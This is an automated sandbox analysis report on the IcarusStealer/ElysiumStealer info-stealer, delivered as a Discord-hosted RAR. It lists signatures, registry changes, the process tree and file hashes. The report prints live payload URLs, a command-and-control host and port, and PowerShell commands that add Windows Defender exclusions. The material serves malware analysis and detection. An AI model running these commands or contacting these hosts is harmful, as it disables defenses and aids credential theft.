Analysis
-
max time kernel
57s -
max time network
90s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29/02/2024, 03:49
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://cdn.discordapp.com/attachments/1206678790714167397/1212606933173796874/Icarus.rar?ex=65f27336&is=65dffe36&hm=afd4f6fc3047dc5fc2aa3e00bae2ccfdb8c535c7e83f63508c1ad55c67d03456&
Resource
win10v2004-20240226-en
General
-
Target
https://cdn.discordapp.com/attachments/1206678790714167397/1212606933173796874/Icarus.rar?ex=65f27336&is=65dffe36&hm=afd4f6fc3047dc5fc2aa3e00bae2ccfdb8c535c7e83f63508c1ad55c67d03456&
Malware Config
Extracted
icarusstealer
-
payload_url
https://blackhatsec.org/add.jpg
https://blackhatsec.org/remove.jpg
Signatures
-
ElysiumStealer
ElysiumStealer (previously known as ZeromaxStealer) is an info stealer that can steal login credentials for various accounts.
-
ElysiumStealer Support DLL 1 IoCs
resource yara_rule behavioral1/files/0x0008000000023217-175.dat elysiumstealer_dll -
IcarusStealer
Icarus is a modular stealer written in C# First adverts in July 2022.
-
Modifies Installed Components in the registry 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Software\Microsoft\Active Setup\Installed Components explorer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000\Control Panel\International\Geo\Nation ICARUS.exe -
Executes dropped EXE 3 IoCs
pid Process 4392 ICARUS.exe 1572 ICARUS.exe 5228 zerosmenu.exe -
Loads dropped DLL 1 IoCs
pid Process 1572 ICARUS.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: explorer.exe File opened (read-only) \??\D: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 62 raw.githubusercontent.com 61 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 66 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5228 set thread context of 5500 5228 zerosmenu.exe 122 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2727153400-192325109-1870347593-1000\{3A13C6B2-6298-49B2-BF90-C73912D6719F} explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Key created \REGISTRY\USER\S-1-5-21-2727153400-192325109-1870347593-1000_Classes\Local Settings\MuiCache SearchApp.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
pid Process 3856 msedge.exe 3856 msedge.exe 2868 msedge.exe 2868 msedge.exe 2424 msedge.exe 2424 msedge.exe 3336 identity_helper.exe 3336 identity_helper.exe 5228 zerosmenu.exe 5228 zerosmenu.exe 5228 zerosmenu.exe 5228 zerosmenu.exe 6004 powershell.exe 6004 powershell.exe 6012 powershell.exe 6012 powershell.exe 6012 powershell.exe 6004 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeRestorePrivilege 4440 7zG.exe Token: 35 4440 7zG.exe Token: SeSecurityPrivilege 4440 7zG.exe Token: SeSecurityPrivilege 4440 7zG.exe Token: SeDebugPrivilege 5228 zerosmenu.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeDebugPrivilege 5500 cvtres.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeDebugPrivilege 6004 powershell.exe Token: SeDebugPrivilege 6012 powershell.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe Token: SeShutdownPrivilege 5480 explorer.exe Token: SeCreatePagefilePrivilege 5480 explorer.exe -
Suspicious use of FindShellTrayWindow 42 IoCs
pid Process 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 4440 7zG.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 2868 msedge.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe 5480 explorer.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 5824 StartMenuExperienceHost.exe 1408 SearchApp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2868 wrote to memory of 4276 2868 msedge.exe 47 PID 2868 wrote to memory of 4276 2868 msedge.exe 47 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 4648 2868 msedge.exe 87 PID 2868 wrote to memory of 3856 2868 msedge.exe 86 PID 2868 wrote to memory of 3856 2868 msedge.exe 86 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88 PID 2868 wrote to memory of 3900 2868 msedge.exe 88
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1206678790714167397/1212606933173796874/Icarus.rar?ex=65f27336&is=65dffe36&hm=afd4f6fc3047dc5fc2aa3e00bae2ccfdb8c535c7e83f63508c1ad55c67d03456&1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd292b46f8,0x7ffd292b4708,0x7ffd292b47182⤵PID:4276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2344 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:22⤵PID:4648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:82⤵PID:3900
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:12⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:12⤵PID:1336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:12⤵PID:4032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5288 /prefetch:82⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5656 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2424
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3116 /prefetch:82⤵PID:1344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3116 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6048 /prefetch:12⤵PID:1876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:2480
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5008 /prefetch:12⤵PID:3328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,5911354758348154954,2606238311182766048,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:12⤵PID:3724
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4120
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1776
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1548
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Icarus\" -ad -an -ai#7zMap3287:74:7zEvent185421⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4440
-
C:\Users\Admin\Downloads\Icarus\Icarus\ICARUS.exe"C:\Users\Admin\Downloads\Icarus\Icarus\ICARUS.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4392 -
C:\Users\Admin\AppData\Local\Temp\ICARUS.exe"C:\Users\Admin\AppData\Local\Temp\ICARUS.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1572
-
-
C:\Users\Admin\AppData\Local\Temp\zerosmenu.exe"C:\Users\Admin\AppData\Local\Temp\zerosmenu.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5228 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z5wztiiz\z5wztiiz.cmdline"3⤵PID:5408
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES858.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC294D20B18B994404BFE86C92136F189C.TMP"4⤵PID:5444
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe3⤵PID:5488
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client case-shield.gl.at.ply.gg 26501 PUGlcQLxe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5500 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit4⤵PID:5892
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6012
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit4⤵PID:5920
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6004
-
-
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"3⤵
- Modifies Installed Components in the registry
- Enumerates connected drives
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5480
-
-
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5824
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1408
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:1496
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:5928
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:2584
-
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca1⤵PID:4964
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
152B
MD573c8d54f775a1b870efd00cb75baf547
SHA133024c5b7573c9079a3b2beba9d85e3ba35e6b0e
SHA2561ce86be0476a2a9e409fcb817126285bc4ad83efd03ee06a2f86910fe18d4d94
SHA512191344f5830cfea68499bd49073ffa7215a42265a9629d203d07849b2417c0ffdbdbf288bf2c669e91009a0d7e8bd6a6b378c92fc283049141231ca7bf4da3b8
-
Filesize
152B
MD54b206e54d55dcb61072236144d1f90f8
SHA1c2600831112447369e5b557e249f86611b05287d
SHA25687bf9a4c3564eb3d8bef70450da843ae6003271222734c4d28d9961c52782e0b
SHA512c9e8d2452368873e0622b002a0c2f8a2714b5897a09475738a9f9740122d716a9f0d3841725230d58e039564c820d32a6f3a675a7bb04bd163bab53dcb4e22f2
-
Filesize
186B
MD5094ab275342c45551894b7940ae9ad0d
SHA12e7ce26fe2eb9be641ae929d0c9cc0dfa26c018e
SHA256ef1739b833a1048ee1bd55dcbac5b1397396faca1ad771f4d6c2fe58899495a3
SHA51219d0c688dc1121569247111e45de732b2ab86c71aecdde34b157cfd1b25c53473ed3ade49a97f8cb2ddc4711be78fa26c9330887094e031e9a71bb5c29080b0d
-
Filesize
6KB
MD535ca82fa00a90458e6118830de463b22
SHA18966ad0d79cdeba2531066ce155dbef5bf0724a8
SHA256adf0f22fc634a8bf375ea8db365ea99955f20bc88bd29d006a21460bca1b495d
SHA512899e0c665c936de158fa40112d1c5f30f169b2e0b8e0f55f900d65243162f23e8897266a07fcbe6af648be17787d44bcb066ad4a3b7f0d8387ed4bbaf4b1108f
-
Filesize
6KB
MD585cb756dd5148fd3b83e742f40610e0b
SHA152a7a444045f7d919d4a3e3c8e92c82e08a20a28
SHA2564f2bee47ad6183b589901a34bfe6998fc195c114beed1beed0be7d84205bde7b
SHA51214471f8cca03bcff6b124b1fbd64464dcacb7dbae57140b5c4f110a0edead6f3f8e6c6ee4d4f3d8b8c58f0d36fd2342dccbdbab6ff36e53ce587f4ce378cc2a7
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
11KB
MD5e563e3c04cccf3df8a719a92ce9ff010
SHA1c44e6292bc43d4db949ea4ccf3644af9e5671b50
SHA256a8e8b3f9f7466125d94b0583bf5996105db275d86b72c1cc7bc3a14b9fd2839f
